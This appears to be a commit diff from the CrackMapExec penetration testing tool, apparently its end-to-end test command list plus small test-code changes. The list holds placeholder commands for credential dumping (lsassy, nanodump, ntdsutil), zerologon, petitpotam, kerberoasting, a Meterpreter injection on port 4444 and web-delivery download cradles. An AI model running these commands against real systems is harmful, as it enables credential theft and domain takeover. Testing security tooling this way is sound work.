# crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M spider_plus -o MAX_FILE_SIZE=100
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M spooler
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M teams_localdb
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M test_connection --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M test_connection -o HOST=localhost
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M uac
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M veeam
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M wdigest --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M wdigest -o ACTION=enable
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M wdigest -o ACTION=disable
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M web_delivery --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M web_delivery -o URL=localhost/dl_cradle
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M webdav
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M webdav --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M webdav -o MSG="Message: {}"
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M wifi
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M winscp
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M zerologon
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M spooler -M petitpotam -M zerologon -M nopac -M dfscoerce -M enum_av -M enum_dns -M gpp_autologin -M gpp_password -M lsassy -M impersonate -M install_elevated -M ioxidresolver -M ms17-010 -M ntlmv1 -M runasppl -M shadowcoerce -M uac -M webdav -M wifi
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M bh_owned --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M dfscoerce --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M empire_exec --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M enum_av --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M firefox --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M get_netconnections --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M gpp_autologin --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M gpp_password --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M hash_spider --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M impersonate --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M install_elevated --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M ioxidresolver --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M keepass_discover --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M keepass_trigger --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M lsassy --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M masky --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M met_inject --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M ms17-010 --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M msol --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M nanodump --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M nopac --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M ntdsutil --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M ntlmv1 --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M petitpotam --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M procdump --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdcman --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M reg-query --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M runasppl --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M scuffy --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M shadowcoerce --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M slinky --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M spider_plus --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M spooler --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M teams_localdb --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M uac --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M veeam --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M wifi --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M winscp --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M zerologon --options
crackmapexec smb TARGET -u '' -p '' -M zerologon
crackmapexec smb TARGET -u '' -p '' -M petitpotam
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS --users
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS --groups
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS --get-sid
crackmapexec ldap TARGET -u USER -p '' --asreproast /tmp/output.txt
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS --kerberoasting /tmp/output2.txt
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS --trusted-for-delegation
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS --admin-count
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS --gmsa
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS -M laps
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS -M maq
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS -M get-desc-users
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS -M adcs
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS -M get-network
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS -M get-network -o ONLY_HOSTS=true
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS -M get-network -o ALL=true
crackmapexec ldap TARGET -u USER -p PASSWORD KERBEROS -M ldap-checker
crackmapexec winrm TARGET -u USER -p PASSWORD
crackmapexec winrm TARGET -u USER -p PASSWORD -X whoami
crackmapexec winrm TARGET -u USER -p PASSWORD --laps
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --users
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --groups
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --get-sid
crackmapexec ldap TARGET -u USERNAME -p '' --asreproast /tmp/output.txt
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --kerberoasting /tmp/output2.txt
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --trusted-for-delegation
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --admin-count
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --gmsa
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M adcs
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M adcs --options
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M daclread
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M daclread --options
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M get-desc-users
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M get-desc-users --options
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M get-network
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M get-network --options
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M groupmembership --options
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M groupmembership -o USER=USERNAME
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M laps
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M laps --options
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M ldap-checker
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M ldap-checker --options
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M maq
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M maq --options
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M subnets
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M subnets --options
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M user-desc
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M user-desc --options
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M whoami
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M whoami --options
crackmapexec winrm TARGET -u USERNAME -p PASSWORD
crackmapexec winrm TARGET -u USERNAME -p PASSWORD -X whoami
crackmapexec winrm TARGET -u USERNAME -p PASSWORD --laps
crackmapexec mssql TARGET -u USERNAME -p PASSWORD
# crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M empire_exec
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M met_inject --options
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M mssql_priv
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M mssql_priv --options
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M nanodump
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M nanodump --options
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M test_connection --options
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M test_connection -o HOST=localhost
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M web_delivery --options
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M web_delivery -o URL=localhost/dl_cradle

4
tests/e2e_test.py
View File

@ -31,9 +31,11 @@ def generate_commands():
with open(commands_file) as file:
for line in file:
if line.startswith("#"):
continue
line = line.strip()
line = line.replace("TARGET", args.target) \
.replace("USER", f"\"{args.username}\"") \
.replace("USERNAME", f"\"{args.username}\"") \
.replace("PASSWORD", f"\"{args.password}\"") \
.replace("KERBEROS", kerberos)
lines.append(line)

5
tests/test_smb_database.py
View File

@ -5,9 +5,10 @@ import os
import pytest
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, scoped_session
from cme.cmedb import create_workspace, delete_workspace
from cme.first_run import first_run_setup
from cme.loaders.protocol_loader import protocol_loader
from cme.loaders.protocolloader import ProtocolLoader
from cme.logger import setup_logger, CMEAdapter
from cme.paths import WS_PATH
from sqlalchemy.dialects.sqlite import Insert
@ -31,7 +32,7 @@ def db_setup(db_engine):
setup_logger()
logger = CMEAdapter()
first_run_setup(logger)
p_loader = protocol_loader()
p_loader = ProtocolLoader()
protocols = p_loader.get_protocols()
create_workspace("test", p_loader, protocols)